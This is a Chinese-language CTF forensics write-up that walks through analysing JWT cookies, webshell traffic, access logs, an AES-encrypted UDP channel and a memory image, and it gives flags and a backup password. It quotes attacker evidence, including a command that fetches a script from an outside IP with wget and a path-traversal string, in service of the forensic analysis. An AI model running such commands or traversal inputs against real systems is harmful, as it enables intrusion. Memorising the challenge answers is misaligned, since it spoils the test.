寫在前面的話，結局排名離譜，最后兩分鐘直接掉了70多名，排出100以外…很久沒有打比賽了，但是也沒想到國內的CTF環境已經差到這種地步了，另外就是題目都挺好，個別的題目暫時這里不給出解題程序，見諒

簽到

操作內容：
看請求包，http請求回傳403

Jwt

操作內容：

看cookie，jwt格式
找個在線解jwt的網站，將cookie解碼，注意不要解登錄失敗那個，解登陸成功的
看流量包，alert（“root”）
wireshark打開，包序號103 109這兩個包，將檔案都試下
包序號109，用echo寫了個makefile,能看到so的名字
包序號 129，/etc/pam.d/common-auth

Webshell

操作內容：
3.1追蹤tcp流，第5流得到密碼
在這里插入圖片描述

3.2黑客修改了一個日志檔案，檔案的絕對路徑為_____________，（請確認絕對路徑后再提交）
追蹤第31流的tcp流，然后看http報文，得到當前絕對路徑，然后拼上這個log的名字
在這里插入圖片描述

3.3黑客獲取webshell之后，權限是______
查看whoami的回傳結果，（不過一般猜也能猜到是www-data）
在這里插入圖片描述

3.4黑客寫入的webshell檔案名是_____________，
后面訪問的1.php即是webshell檔案

在這里插入圖片描述

3.5黑客上傳的代理工具客戶端名字是_____________，（如有字母請全部使用小寫）
查看post內容，urldecode解碼后，base64解碼鍵為j680……的值的內容（根據代碼內容，有一個substr，需要去除開頭兩個字符，）解碼得到frpc.ini
在這里插入圖片描述

3.6黑客代理工具的回連服務端IP是_____________，
3.7黑客的socks5的連接賬號、密碼是______，（中間使用#號隔開，例如admin#passwd）
十六進制解碼鍵為xa5d……的值，得到所有資訊，包括回連IP、回連埠、用戶名、密碼，代理插件等等

日志分析

操作內容：
1．看流量www.zip
在這里插入圖片描述

access.log，發現了寫…/…/…/…/…/…/…//tmp/sess_car欄位，判斷檔案/tmp/sess_car
讀檔案使用的類是SplFileObject

在這里插入圖片描述

流量分析

操作內容：
分析pcap流量包，主機ip應該是172.18.0.1，可以看到很多UDP協議的包，在看包內容的時候，注意到UDP包頭都是P05=，而且有的是有base64，也有亂碼的包，P05=后面都是00 00 00 00和01 00 00 00，其中00的長度是32、01的長度是16，可能是認證，

根據長度為16猜測可能是aes，用長度16的base64（即P05=后面是01 00 00 00的）作為aes key解密發現解密成功了，02 00 00 00對應的包里面都有一個可見字符，其中受害IP172.18.0.125有命令：wget http://147.182.251.98/d.sh;所以第一問為127.18.0.125，第二問密鑰就是18217號包里的DtX0GScM9dwrgZht，第三問ip即為147.182.251.98（udp.stream eq 85）
在這里插入圖片描述

記憶體分析

操作內容：
6.1 使用工具volatility（kali自帶）
imageinfo指令獲取系統資訊
在這里插入圖片描述

直接使用lsadump指令查看最后登錄的用戶
在這里插入圖片描述

得到flag
flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}

6.2

filescan 指令掃描檔案
可以把輸出內容保存到新文本檔案中便于查看

找到HUAWEI P40
在這里插入圖片描述

使用dumpfiles指令提取檔案
在這里插入圖片描述

Kali中可以直接從dat檔案中解壓得到備份資料包檔案夾
在這里插入圖片描述

打開發現為加密檔案
在這里插入圖片描述

查到可以使用華為的資料包解密工具
https://github.com/RealityNet/kobackupdec
使用指令python3 kobackupdec.py -vvv 密碼加密檔案夾解密存盤目錄
根據提示密碼為上題中的flag空格換成_
W31C0M3_T0_THiS_34SY_F0R3NSiCX
即可得到解密后的檔案夾（此處為a）
在這里插入圖片描述